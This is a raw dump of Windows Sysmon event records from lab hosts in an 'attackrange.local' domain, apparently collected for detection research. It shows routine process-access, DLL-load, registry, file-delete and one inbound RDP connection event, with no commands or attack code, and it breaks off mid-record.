14:57:30.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-C0A3-607E-6D05-00000000BB01}3468C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.155{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.155{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-EBDA-607E-BE0C-00000000BB01}41722888C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BE0C-00000000BB01}4172C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-BD0C-00000000BB01}3784C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39526d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+3953a3|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a81f4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434879|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434c14|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.124{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.124{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.124{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.108{A7A01FEF-EBDA-607E-BC0C-00000000BB01}70442880C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.108{A7A01FEF-EBDA-607E-BB0C-00000000BB01}23086080C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.108{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BC0C-00000000BB01}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.108{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BB0C-00000000BB01}2308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.108{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50921828C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108859|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7330e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7319a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+444095|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+44280c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.092{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-B90C-00000000BB01}5472C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395356|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a81f4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434879|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434c14|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000074584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:30.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Client\C2R32.dll2021-04-20 14:57:30.077 11241100x800000000000000074583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:30.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\root\Client\AppvIsvSubsystems32.dll2021-04-20 14:57:30.077 13241300x800000000000000074582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:57:30.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\O365ProPlusRetail - en-us\PublisherMicrosoft Corporation 23542300x800000000000000074581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.046{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02C163111D55796A444F34CEB9A2AE21,SHA256=98FB90C66093FB12DBABAD7948096D9A6E9BBE3E0B738E3292573441AC296EA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050279Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:30.489{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A48623F7D45844567D5FBA3DAE74327A,SHA256=3721438E163A07655E6AE4946F373D999EF999734794483D97BBB0E9C4744EF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050278Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:27.920{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60827-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050277Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:30.192{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C4FAF3A85BF094EE296A60532542BE8,SHA256=42D91E1814ACFABFD596051AC75AE265D7B089D4B714B385E58BCBBD32D003FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.983{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.967{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.936{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.921{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.921{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-593.datMD5=5708B46EF0D2B3A080A0B7323EBF61E5,SHA256=D8FEA09DB7377872108D740897DE24F09EE901DC5FDC95086AE8CD4E00C76517,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.905{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 